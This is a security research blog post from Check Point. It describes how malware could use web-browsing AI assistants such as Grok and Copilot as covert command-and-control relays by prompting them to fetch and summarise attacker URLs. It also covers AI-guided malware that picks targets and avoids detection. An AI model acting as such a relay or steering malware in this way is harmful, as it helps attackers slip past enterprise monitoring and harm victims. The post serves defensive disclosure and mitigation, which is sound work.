• Check Point Research identified a potential future attack technique in which AI assistants with web-browsing capabilities could be abused as covert command-and-control (C2) channels.
  • As AI services become widely adopted and implicitly trusted, their network traffic increasingly blends into normal enterprise activity, expanding the attack surface.
  • AI-enabled C2 could allow attacker communications to evade traditional detection by hiding inside legitimate-looking AI interactions.
  • The same building blocks point toward a broader shift to AI-driven malware, where AI systems influence targeting, prioritization, and operational decisions rather than serving only as development tools.

Check Point Research has identified a potential new abuse pattern: AI assistants with web-browsing capabilities could, in the future, be repurposed as covert command-and-control (C2) relays. While we have not observed threat actors exploiting this technique in active campaigns, the growing adoption of AI services expands the attack surface available to adversaries. In effect, AI services could be used as a proxy layer that hides malicious communication inside legitimate-looking AI traffic. More broadly, this research points to a growing shift toward AI-driven malware, where AI is no longer just a development aid but an active component of malware operations.

From AI-Assisted Attacks to AI-Driven Malware

AI has already lowered the barrier to entry for cyber crime. Attackers routinely use it to generate malware code, craft phishing messages, translate lures, write scripts, and summarize stolen data. These uses reduce cost and speed up operations, allowing even low skill actors to execute more sophisticated campaigns.

The Change: Where AI is Used

Decision making in AI-driven malware is no longer fully hardcoded. Instead of following a fixed sequence of instructions, malware can collect information about its environment and rely on AI output to decide what to do next. This may include determining whether a system is worth targeting, which actions to prioritize, how aggressively to operate, or when to remain dormant.

The result is malware that behaves less like a script and more like an adaptive operator. This makes campaigns harder to predict, harder to model, and less reliant on repeatable patterns that defenders typically detect.

AI Assistants as a Covert C2 Channel

Abusing legitimate cloud services for command and control is not new. Attackers have long hidden communications inside platforms such as email, cloud storage, and collaboration tools. The weakness of those approaches is also well known: accounts can be blocked, API keys revoked, and tenants suspended.

AI assistants accessed through web interfaces change that equation.

Check Point Research demonstrated that AI platforms offering web-browsing or URL-fetch capabilities could be abused as intermediaries between malware and attacker-controlled infrastructure. By prompting an AI assistant to fetch and summarize content from a specific URL, malware can send data out and receive commands back, without ever directly contacting a traditional C2 server.

Proposed flow for malware to use an AI Webchat in order to communicate with a C2 server

This technique was demonstrated in a controlled research setting against Grok and Microsoft Copilot, both of which allow web access through their interfaces. Crucially, the interaction can occur without API keys or authenticated user accounts, reducing the effectiveness of common takedown mechanisms.

From a network perspective, the traffic appears similar to normal AI usage. From an attacker’s perspective, the AI service becomes a stealthy relay that blends into allowed enterprise communications.

Why This Matters Beyond One Technique

On its own, using AI assistants as a C2 proxy is a service-abuse technique. Its real significance lies in what it enables next.

Once AI services can be used as a transport layer, they can also carry instructions, prompts, and decisions, not just raw commands. This opens the door to malware that relies on AI for operational guidance rather than static logic.

Instead of embedding complex decision trees, malware could send a short description of the infected system, such as user context, environment indicators, or software profile, and receive guidance on how to proceed. Over time, this allows campaigns to adapt dynamically across victims without changing code.

This shift mirrors trends already seen in legitimate IT operations, where automation and AI-driven decision systems increasingly guide workflows. In malicious operations, the same ideas translate into AIOps-style command and control, where AI helps manage infections, prioritize targets, and optimize outcomes.

The Near-Future Impact of AI-Driven Attacks

While today’s AI-driven malware remains largely experimental, there is one area where AI is likely to have a decisive impact: targeting and prioritization.

Instead of encrypting everything, stealing everything, or spreading indiscriminately, future attacks could use AI to identify what actually matters. This may include determining whether a system belongs to a high-value user or organization, prioritizing sensitive files or databases, avoiding sandboxes and analysis environments, or reducing noisy activity that typically triggers detection.

For ransomware and data-theft operations, this is particularly important. Many defensive tools rely on volume-based indicators, such as how fast files are encrypted or how much data is accessed. AI-driven targeting allows attackers to achieve impact with far fewer observable events, shrinking the window for detection.

A Shift Defenders Can’t Ignore

This is not a traditional software vulnerability. It is a service-abuse problem rooted in how trusted AI platforms are integrated into enterprise environments.

Any AI service that can fetch external content or browse the web inherits a degree of abuse potential. As AI becomes more embedded in daily workflows, defenders can no longer treat AI traffic as inherently benign.

Mitigations will require action on both sides. AI providers need stronger controls around web-fetch capabilities, clearer guardrails for anonymous usage, and better enterprise visibility. Defenders need to treat AI domains as high-value egress points, monitor for automated or abnormal usage patterns, and incorporate AI traffic into threat hunting and incident response.

Looking Ahead

Following responsible disclosure, Microsoft confirmed our findings and implemented changes to address the behavior in Copilot’s web-fetch flow.

From a defensive standpoint, organizations need visibility and control over AI-bound traffic. Check Point’s AI Security leverages agentic AI capabilities to inspect and contextualize traffic to and from AI services and block malicious communication attempts before they can be abused as covert channels. As enterprises accelerate AI adoption, security controls must evolve in parallel to ensure that trusted AI platforms do not become blind spots in the network.

You may also like